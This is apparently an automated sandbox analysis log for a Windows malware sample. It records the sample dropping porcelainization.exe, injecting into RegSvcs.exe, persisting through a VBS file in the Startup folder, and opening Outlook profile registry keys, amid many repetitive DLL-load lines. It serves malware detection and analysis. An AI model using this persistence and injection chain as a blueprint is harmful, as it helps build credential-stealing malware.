Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\underbalance\porcelainization.exe"	Jump to behavior

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: yqfze5TKW7.exe

Static file information: File size 1094144 > 1048576

Source: yqfze5TKW7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: yqfze5TKW7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: yqfze5TKW7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: yqfze5TKW7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: yqfze5TKW7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: yqfze5TKW7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: yqfze5TKW7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2746643773.00000000027F8000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2746600347.0000000003139000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: porcelainization.exe, 00000002.00000003.1526731104.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, porcelainization.exe, 00000002.00000003.1529325944.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, porcelainization.exe, 00000005.00000003.1647762730.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, porcelainization.exe, 00000005.00000003.1647561040.0000000004210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: porcelainization.exe, 00000002.00000003.1526731104.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, porcelainization.exe, 00000002.00000003.1529325944.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, porcelainization.exe, 00000005.00000003.1647762730.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, porcelainization.exe, 00000005.00000003.1647561040.0000000004210000.00000004.00001000.00020000.00000000.sdmp

Source: yqfze5TKW7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: yqfze5TKW7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: yqfze5TKW7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: yqfze5TKW7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: yqfze5TKW7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00624B37 LoadLibraryA,GetProcAddress,

0_2_00624B37

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00648945 push ecx; ret	0_2_00648958
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01008945 push ecx; ret	2_2_01008958
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0117070E push es; iretd	2_2_0117070F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C40C push cs; iretd	3_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C50E push cs; iretd	3_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E21D push ecx; ret	3_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C6BE push ebx; ret	3_2_0041C6BF

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

File created: C:\Users\user\AppData\Local\underbalance\porcelainization.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs

Jump to behavior

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_006248D7
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006A5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_006A5376
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_00FE48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_00FE48D7
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01065376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_01065376

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00643187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00643187

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
